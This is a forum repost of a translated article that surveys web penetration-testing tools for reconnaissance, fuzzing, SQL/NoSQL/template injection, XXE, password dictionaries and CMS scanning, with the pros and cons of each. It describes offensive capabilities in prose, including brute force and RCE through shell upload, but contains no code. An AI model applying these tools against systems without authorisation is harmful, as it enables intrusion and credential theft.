Jump to content
Sign in to follow this  

Web tools, or where to start pentester?

Recommended Posts


Web tools, or where to start pentester?

We continue to talk about useful tools for pentester. In the new article we will look at tools for analyzing the security of web applications. 

Our colleague BeLove already did a similarselection about seven years ago. It is interesting to see which tools have retained and strengthened their positions, and which have faded into the background and are now rarely used.

Note that the Burp Suite also applies here, but there will be a separate publication about it and its useful plugins.




Amass is a Go tool for searching and iterating DNS subdomains and mapping an external network. Amass is an OWASP project created to show how organizations on the Internet look to an outsider. Amass gets the names of subdomains in various ways, the tool uses both recursive enumeration of subdomains and search in open sources. 

To find connected network segments and autonomous system numbers, Amass uses the IP addresses obtained during operation. All found information is used to build a network map.


  • Information collection techniques include: 
    * DNS - enumeration of subdomains in a dictionary, bruteforce subdomains, “smart” enumeration using mutations based on the found subdomains, reverse DNS requests and search for DNS servers on which it is possible to request a zone transfer request ( AXFR); 

    * Search for open sources - Ask, Baidu, Bing, CommonCrawl, DNSDB, DNSDumpster, DNSTable, Dogpile, Exalead, FindSubdomains, Google, IPv4Info, Netcraft, PTRArchive, Riddler, SiteDossier, ThreatCrowd, VirusTotal, Yahoo; 

    * Search TLS certificate databases - Censys, CertDB, CertSpotter, Crtsh, Entrust; 

    * Using the API of search engines - BinaryEdge, BufferOver, CIRCL, HackerTarget, PassiveTotal, Robtex, SecurityTrails, Shodan, Twitter, Umbrella, URLScan;

    * Search the web archives of the Internet: ArchiveIt, ArchiveToday, Arquivo, LoCArchive, OpenUKArchive, UKGovArchive, Wayback;
  • Integration with Maltego;
  • Provides the most complete coverage for the task of finding DNS subdomains.


  • Be careful with amass.netdomains — he will try to access each IP address in the identified infrastructure and obtain domain names from reverse DNS queries and TLS certificates. This is a "loud" technique, it can reveal your intelligence actions in the organization under study.
  • High memory consumption can consume up to 2 GB of RAM in different settings, which will not allow running this tool in the cloud on a cheap VDS.



Altdns is a Python tool for compiling dictionaries for brute force DNS subdomains. Allows you to generate many options for subdomains using mutations and permutations. To do this, use words that are often found in subdomains (for example: test, dev, staging), all mutations and permutations are applied to already known subdomains, which can be submitted to the input of Altdns. The output is a list of variations of subdomains that may exist, and this list can later be used for DNS brute force.


  • Works well with large data sets.


aquatone - was previously better known as another tool for finding subdomains, but the author himself abandoned this in favor of the aforementioned Amass. Now aquatone is rewritten to Go and more geared for pre-exploration of websites. To do this, aquatone passes through the specified domains and searches for websites on different ports, after which it collects all the information about the site and makes a screenshot. Convenient for quick preliminary exploration of websites, after which you can select priority targets for attacks.


  • At the output, it creates a group of files and folders that are conveniently used for further work with other tools: 
    * HTML report with collected screenshots and response headers grouped by similarity; 

    * File with all the URLs on which the websites were found; 

    * File with statistics and data page; 

    * Folder with files containing the response headers from the found targets; 

    * Folder with files containing the response body from the found targets; 

    * Screenshots of found websites;
  • Supports work with XML reports from Nmap and Masscan;
  • Uses headless chrome / chromium for screenshots rendering.


  • It may attract the attention of intrusion detection systems, and therefore requires adjustment.

The screenshot was made for one of the old versions of aquatone (v0.5.0), in which the search for DNS subdomains was implemented.Older versions can be found on the release page
Screenshot aquatone v0.5.0


MassDNS is another tool for finding DNS subdomains. Its main difference is that it makes DNS queries directly to many different DNS resolvers and does so with considerable speed.


  • Fast - able to resolve more than 350 thousand names per second.


  • MassDNS can cause a significant load on the DNS resolvers used, which can lead to a ban on these servers or complaints to your provider. In addition, it will cause a large load on the company's DNS servers, if they have them and if they are responsible for the domains you are trying to resolve.
  • The list of resolvers is currently outdated, but if you select broken DNS resolvers and add new known ones, everything will be fine.



nsec3map is a Python tool to get a complete list of DNSSEC protected domains.


  • Quickly detects hosts in DNS zones with a minimal number of queries if DNSSEC support is enabled in the zone;
  • As part of the plugin for John the Ripper, which can be used to crack the resulting NSEC3 hashes.


  • Many DNS errors are handled incorrectly;
  • There is no automatic parallelization of processing NSEC records - you have to split the namespace manually;
  • High memory consumption.


Acunetix is a web vulnerability scanner that automates the process of checking web application security. Tests the application for SQL injection, XSS, XXE, SSRF, and many other web vulnerabilities. However, just like any other scanner of multiple web vulnerabilities does not replace the pentester, since complex chains of vulnerabilities or vulnerabilities in logic cannot be found. But it covers a lot of different vulnerabilities, including different CVEs, which the pentester could have forgotten, therefore, it is very convenient to get rid of routine checks.


  • Low level of false positives;
  • Results can be exported as reports;
  • Performs a large number of checks for different vulnerabilities;
  • Parallel scanning of multiple hosts.


  • There is no de-duplication algorithm (Acunetix pages that are of the same functionality will be considered different, because different URLs lead to them), but the developers are working on it;
  • Requires installation on a separate web server, which makes it difficult to test client systems with a VPN connection and use the scanner in an isolated segment of the local client network;
  • It can “rustle” the service under study, for example, send too many attacking vectors to the communication form on the site, thereby greatly complicating business processes;
  • It is a proprietary and, accordingly, non-free solution.



Dirsearch is a Python tool for brute force directories and files on websites.


  • It can distinguish real “200 OK” pages from “200 OK” pages, but with the text “page not found”;
  • Comes with a handy dictionary that has a good balance between size and search efficiency. Contains standard paths typical of many CMS and technology stacks;
  • Its dictionary format, which allows to achieve good efficiency and flexibility of searching files and directories;
  • Convenient output - plain text, JSON;
  • Able to do throttling - a pause between requests, which is vital for any weak service.


  • Extensions must be passed as a string, which is inconvenient if you need to transfer many extensions at once;
  • In order to use your dictionary, it will need to be slightly modified to the format of the Dirsearch dictionaries for maximum efficiency.



wfuzz - Python-fazzer web applications.Probably one of the most famous web phasers.The principle is simple: wfuzz allows phasing any place in an HTTP request, which allows phasing of GET / POST parameters, HTTP headers, including Cookies and other authentication headers. At the same time, it is convenient for simple brute force directories and files, for which you need a good dictionary. It also has a flexible filter system, with which you can filter the responses from the website by different parameters, which allows you to achieve effective results.


  • Multifunctional - modular structure, assembly takes several minutes;
  • Convenient filtering and fuzzing mechanism;
  • You can phase out any HTTP method, as well as any place in the HTTP request.


  • In the state of development.



ffuf - a web-fazer on Go, created in a similar fashion to wfuzz, allows files, directories, URL paths, names and values of GET / POST parameters, HTTP headers, including the Host header for virtual hosts brute-force. Wfuzz differs from its colleague by higher speed and some new features, for example, Dirsearch format dictionaries are supported.


  • Filters are similar to wfuzz filters, allow flexible configuration of brute force;
  • Allows fuzzing HTTP header values, data from POST requests and various parts of the URL, including the names and values of GET parameters;
  • You can specify any HTTP method.


  • In the state of development.



gobuster - a tool for Go for intelligence, has two modes of operation. The first one is used for brute-force files and directories on the website, the second one is used to iterate over the DNS subdomains. The tool initially does not support recursive enumeration of files and directories, which, of course, saves time, but on the other hand, the brute force of each new endpoint on the website needs to be launched separately.


  • High speed for both brute force DNS subdomains, and for brute force files and directories.


  • The current version does not support the installation of HTTP headers;
  • By default, only some of the HTTP status codes (200,204,301,302,307) are considered valid.



Arjun is a tool for brute-force hidden HTTP parameters in GET / POST parameters, as well as in JSON. The built-in dictionary has 25,980 words that Ajrun checks in almost 30 seconds.The trick is that Ajrun does not check each parameter separately, but checks immediately ~ 1000 parameters at a time and looks to see if the answer has changed. If the answer has changed, then divides this 1000 parameters into two parts and checks which of these parts affects the answer. Thus, using a simple binary search, a parameter or several hidden parameters are found that influenced the answer and, therefore, can exist.


  • High speed due to binary search;
  • Support for GET / POST parameters, as well as parameters in the form of JSON;

By the same principle, the Burp Suite plugin also works - param-miner , which is also very good at finding hidden HTTP parameters. We will tell you more about it in the upcoming article about Burp and its plugins.


LinkFinder is a Python script for searching links in JavaScript files. Useful for finding hidden or forgotten endpoints / URLs in a web application.


  • Fast;
  • There is a special plugin for Chrome based on LinkFinder.


  • Inconvenient final conclusion;
  • Does not analyze JavaScript in dynamics;
  • Quite simple link search logic - if JavaScript is obfuscated in some way, or the links are initially missing and dynamically generated, you will not be able to find anything.



JSParser is a Python script that uses Tornadoand JSBeautifier to analyze relative URLs from JavaScript files. Very useful for detecting AJAX requests and compiling a list of API methods with which the application interacts. Effectively paired with LinkFinder.


  • Quick parsing javascript files.



sqlmap is probably one of the most well-known tools for analyzing web applications. Sqlmap automates the search and operation of SQL injections, works with several SQL dialects, has in its arsenal a huge number of different techniques, ranging from quotes head-on and ending with complex vectors for time-based SQL injections. In addition, it has many techniques for further exploitation for various DBMS, therefore, it is useful not only as a scanner for SQL injections, but also as a powerful tool for exploiting already found SQL injections.


  • A large number of different techniques and vectors;
  • Low number of false positives;
  • Many possibilities for fine tuning, various techniques, target database, tamper scripts for bypassing WAF;
  • Ability to create dump output data;
  • Many different operating possibilities, for example, for some databases - automatic file upload / download, command execution ability (RCE) and others;
  • Support for direct connection to the database using the data obtained during the attack;
  • At the entrance, you can submit a text file with the results of the work Burp - no need to manually compile all the attributes of the command line.


  • It is difficult to customize, for example, to write some of your checks due to poor documentation for this;
  • Without the appropriate settings conducts an incomplete set of checks, which can be misleading.



NoSQLMap is a Python tool for automating the search and operation of NoSQL injection. It is convenient to use not only in NoSQL databases, but also directly when auditing web applications using NoSQL.


  • As well as sqlmap, it allows not only to find a potential vulnerability, but also checks the possibility of its exploitation for MongoDB and CouchDB.


  • Does not support NoSQL for Redis, Cassandra, is being developed in this direction.


oxml_xxe is a tool for embedding XXE XML exploits into various file types that use an XML format in some form.


  • It supports many common formats, such as DOCX, ODT, SVG, XML.


  • Not fully supported PDF, JPEG, GIF;
  • Creates only one file. To solve this problem, you can use the docem tool , which can create a large number of files with paylodes in different places.

The aforementioned utilities do an excellent job with XXE testing when loading documents containing XML. But also do not forget that XML format handlers can occur in many other cases, for example, XML can be used as a data format instead of JSON. 

Therefore, we recommend to pay attention to the following repository containing a large variety of payloads: PayloadsAllTheThings .


tplmap is a Python tool to automatically detect and exploit Server-Side Template Injection vulnerabilities. It has settings similar to sqlmap and flags. It uses several different techniques and vectors, including blind-injections, and also has techniques for executing code and loading / unloading arbitrary files. In addition, it has in its arsenal techniques for a dozen different engines for templates and some techniques for searching eval () - like code injections in Python, Ruby, PHP, JavaScript. In case of successful operation, opens an interactive console.


  • A large number of different techniques and vectors;
  • Supports many engines for rendering templates;
  • A lot of maintenance techniques.


CeWL is a Ruby dictionary generator, created to extract unique words from a specified website, following links on a website to a specified depth.Compiled dictionary of unique words can be used later for brute-force passwords on services or brute-force files and directories on the same web site, or to attack hashes obtained using hashcat or John the Ripper. Useful in compiling a “target” list of potential passwords.


  • Easy to use.


  • You need to be careful with the depth of search, so as not to capture an extra domain.


Weakpass is a service containing many dictionaries with unique passwords. It is extremely useful for various tasks related to password cracking, ranging from simple online brute-force accounts to target services, ending off-line brute-force hashes obtained usinghashcat or John The Ripper . There are about 8 billion passwords in length from 4 to 25 characters.


  • Contains both specific dictionaries and dictionaries with the most common passwords - you can choose a specific dictionary for your own needs;
  • Dictionaries are updated and updated with new passwords;
  • Dictionaries are sorted by efficiency. You can choose the option for quick online brute, as well as for a detailed selection of passwords from the extensive dictionary with the latest leaks;
  • There is a calculator showing the time for password brutus on your hardware.


In a separate group, we would like to bring the tools for CMS checks: WPScan, JoomScan and AEM hacker. 


AEM hacker is a tool for detecting vulnerabilities in Adobe Experience Manager (AEM) applications.


  • Can detect AEM-applications from the list of URLs submitted to the entrance;
  • It contains scripts for obtaining RCE by loading a JSP shell or using SSRF.


JoomScan is a Perl tool to automate the detection of vulnerabilities when deploying a Joomla CMS.


  • Able to find configuration flaws and problems with admin settings;
  • Lists Joomla versions and related vulnerabilities, similar for individual components;
  • Contains more than 1000 exploits for Joomla components;
  • The output of final reports in text and HTML-formats.



WPScan - a tool for scanning sites on WordPress, has in its arsenal vulnerabilities for the WordPress engine itself, as well as for some plugins.


  • Able to list not only unsafe WordPress plugins and themes, but also to get a list of users and TimThumb files;
  • Can conduct brute force attacks on WordPress sites.


  • Without the appropriate settings conducts an incomplete set of checks, which can be misleading.


In general, different people prefer different tools for work: they are all good in their own way, and what one person liked, may not suit another. If you think that we have undeservedly bypassed some good utility, write about it in the comments!
6 subscribers
Share publication
Language settings
Full version
2006-2019 © « TM »

  • Upvote 3

Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Create New...